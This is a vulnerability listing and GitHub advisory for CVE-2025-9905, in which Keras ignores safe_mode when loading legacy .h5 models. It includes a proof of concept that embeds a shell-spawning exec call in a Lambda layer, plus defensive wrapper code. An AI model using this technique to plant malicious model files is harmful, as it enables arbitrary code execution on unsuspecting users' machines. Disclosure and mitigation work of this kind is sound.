
CVE-2025-9905



No CVSS data available

Description

The Keras Model.load_model method can be exploited to achieve arbitrary code execution, even with safe_mode=True.

An attacker can create a specially crafted .h5/.hdf5 model archive that, when loaded via Model.load_model, triggers arbitrary code execution.

This is achieved by crafting a special .h5 archive that uses the Lambda layer feature of Keras, which allows arbitrary Python code to be embedded in the form of pickled code. The vulnerability stems from the fact that the safe_mode=True option is not honored when reading .h5 archives.

Note that the .h5/.hdf5 format is a legacy format supported by Keras 3 for backwards compatibility.
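Until a fixed release is installed, one way to defend against this is to refuse legacy archives before they ever reach Model.load_model. The sketch below is a minimal illustration, not part of the Keras API: the `load_model_strict` wrapper and its behavior are assumptions for this example. Because Keras dispatches to the legacy HDF5 loader purely on the filename suffix, a suffix check here mirrors the library's own dispatch logic.

```python
import keras

# Legacy HDF5 suffixes for which Keras silently ignores safe_mode
# (CVE-2025-9905). Keras itself dispatches on these suffixes.
LEGACY_SUFFIXES = (".h5", ".hdf5")

def load_model_strict(filepath, **kwargs):
    """Hypothetical wrapper (not a Keras API): refuse legacy HDF5
    archives outright, then delegate with safe_mode forced on."""
    if str(filepath).lower().endswith(LEGACY_SUFFIXES):
        raise ValueError(
            f"Refusing to load {filepath!r}: the legacy .h5/.hdf5 format "
            "does not honor safe_mode and can run arbitrary code on load."
        )
    kwargs["safe_mode"] = True  # honored for the .keras v3 format
    return keras.models.load_model(filepath, **kwargs)
```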

Available Exploits

No exploits available for this CVE.

Related News

No news articles found for this CVE.

EU Vulnerability Database

Monitored by ENISA for EU cybersecurity

EU Coordination: EU Coordinated

Exploitation Status: No Known Exploitation


Affected Products (ENISA)

Vendor: keras-team
Product: keras

ENISA Scoring

CVSS Score (v4.0): 7.3 / 10
CVSS:4.0/AV:L/AC:H/AT:P/PR:L/UI:P/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H

Data provided by ENISA EU Vulnerability Database. Last updated: October 3, 2025

GitHub Security Advisories

Community-driven vulnerability intelligence from GitHub

✓ GitHub Reviewed · Severity: HIGH

The Keras `Model.load_model` method **silently** ignores `safe_mode=True` and allows arbitrary code execution when a `.h5`/`.hdf5` file is loaded.

GHSA-36rr-ww3j-vrjv

Advisory Details

**Note:** This report has already been discussed with the Google OSS VRP team, who recommended that I reach out directly to the Keras team. I've chosen to do so privately rather than opening a public issue, due to the potential security implications. I also attempted to use the email address listed in your `SECURITY.md`, but received no response.

---

## Summary

When a model in the `.h5` (or `.hdf5`) format is loaded using the Keras `Model.load_model` method, the `safe_mode=True` setting is **silently** ignored without any warning or error. This allows an attacker to execute arbitrary code on the victim's machine with the same privileges as the Keras application.

This report is specific to the `.h5`/`.hdf5` file format. The attack works regardless of the other parameters passed to `load_model` and does not require any sophisticated technique: `.h5` and `.hdf5` files are simply not checked for unsafe code execution. From this point on, I will refer only to the `.h5` file format, though everything equally applies to `.hdf5`.

## Details

### Intended behaviour

According to the official Keras documentation, `safe_mode` is defined as:

```
safe_mode: Boolean, whether to disallow unsafe lambda deserialization.
When safe_mode=False, loading an object has the potential to trigger
arbitrary code execution. This argument is only applicable to the
Keras v3 model format. Defaults to True.
```

I understand that the behavior described in this report is somehow **intentional**, as `safe_mode` is only applicable to `.keras` models. However, in practice, this behavior is misleading for users who are unaware of the internal Keras implementation. `.h5` files can still be loaded seamlessly using `load_model` with `safe_mode=True`, and the absence of any warning or error creates a **false sense of security**.

Whether intended or not, I believe silently ignoring a security-related parameter is not the best possible design decision. At a minimum, if `safe_mode` cannot be applied to a given file format, an explicit error should be raised to alert the user. This issue is particularly critical given the widespread use of the `.h5` format, despite the introduction of newer formats.

As a small anecdotal test, I asked several of my colleagues what they would expect when loading a `.h5` file with `safe_mode=True`. None of them expected the setting to be **silently** ignored, even after reading the documentation. While this is a small sample, all of these colleagues are cybersecurity researchers, experts in binary or ML security, and regular participants in DEF CON finals. I was careful not to give any hints about the vulnerability in our discussion.

### Technical Details

Examining the implementation of `load_model` in `keras/src/saving/saving_api.py`, we can see that the `safe_mode` parameter is completely ignored when loading `.h5` files. Here's the relevant snippet:

```python
def load_model(filepath, custom_objects=None, compile=True, safe_mode=True):
    is_keras_zip = ...
    is_keras_dir = ...
    is_hf = ...

    # Support for remote zip files
    if (
        file_utils.is_remote_path(filepath)
        and not file_utils.isdir(filepath)
        and not is_keras_zip
        and not is_hf
    ):
        ...

    if is_keras_zip or is_keras_dir or is_hf:
        ...

    if str(filepath).endswith((".h5", ".hdf5")):
        return legacy_h5_format.load_model_from_hdf5(
            filepath, custom_objects=custom_objects, compile=compile
        )
```

As shown, when the file format is `.h5` or `.hdf5`, the method delegates to `legacy_h5_format.load_model_from_hdf5`, which does not use or check the `safe_mode` parameter at all.

### Solution

Since the release of the new `.keras` format, I believe the simplest and most effective way to address this misleading behavior, and to improve security in Keras, is to have the `safe_mode` parameter raise an **explicit error** when `safe_mode=True` is used with `.h5`/`.hdf5` files. This error should be clear and informative, explaining that the legacy format does not support `safe_mode` and outlining the associated risks of loading such files.

I recognize this fix may have minor backward compatibility considerations. If you confirm that you're open to this approach, I'd be happy to open a PR that includes the missing check.

## PoC

From the attacker's perspective, creating a malicious `.h5` model is as simple as the following:

```python
import keras

f = lambda x: (
    exec("import os; os.system('sh')"),
    x,
)

model = keras.Sequential()
model.add(keras.layers.Input(shape=(1,)))
model.add(keras.layers.Lambda(f))
model.compile()

keras.saving.save_model(model, "./provola.h5")
```

From the victim's side, triggering code execution is just as simple:

```python
import keras

model = keras.models.load_model("./provola.h5", safe_mode=True)
```

That's all. The exploit occurs **during model loading**, with no further interaction required. The parameters passed to the method do not mitigate or influence the attack in any way. As expected, the attacker can substitute the `exec(...)` call with any payload. Whatever command is used will execute with the same permissions as the Keras application.

## Attack scenario

The attacker may distribute a malicious `.h5`/`.hdf5` model on platforms such as Hugging Face, or act as a malicious node in a federated learning environment. The victim only needs to load the model, *even with* `safe_mode=True`, which would give the illusion of security. No inference or further action is required, making the threat particularly stealthy and dangerous.

Once the model is loaded, the attacker gains the ability to execute arbitrary code on the victim's machine with the same privileges as the Keras process. The provided proof-of-concept demonstrates a simple shell spawn, but any payload could be delivered this way.
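For illustration, here is a minimal standalone sketch of the guard the reporter proposes. The function name `_reject_unsafe_legacy_load` is an assumption for this example, and the check that actually shipped in a fixed Keras release may differ:

```python
def _reject_unsafe_legacy_load(filepath, safe_mode):
    """Hypothetical guard sketch: raise instead of silently ignoring
    safe_mode for legacy HDF5 files, as the advisory recommends."""
    if safe_mode and str(filepath).endswith((".h5", ".hdf5")):
        raise ValueError(
            "safe_mode=True cannot be enforced for legacy .h5/.hdf5 "
            "models, which may execute arbitrary code when loaded. "
            "Pass safe_mode=False to acknowledge the risk, or convert "
            "the model to the .keras format."
        )
```

Called at the top of `load_model`, such a check would turn the silent downgrade into an explicit, documented failure.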

Affected Packages

PyPI: keras
Affected versions: ≥ 3.0.0, < 3.11.3
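To check whether an installed environment falls in this range, a quick sketch (assuming the `packaging` helper library is available; per the range above, 3.11.3 is the first unaffected version):

```python
# Compare the installed keras version against the advisory's
# affected range (>= 3.0.0, < 3.11.3).
from importlib.metadata import version
from packaging.version import Version

installed = Version(version("keras"))
if Version("3.0.0") <= installed < Version("3.11.3"):
    print(f"keras {installed} is in the affected range; "
          "upgrade, e.g.: pip install -U 'keras>=3.11.3'")
else:
    print(f"keras {installed} is outside the affected range.")
```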

CVSS Scoring

CVSS Score: 7.5

CVSS Vector: CVSS:4.0/AV:L/AC:L/AT:P/PR:N/UI:A/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H

Advisory provided by GitHub Security Advisory Database. Published: September 19, 2025, Modified: September 19, 2025
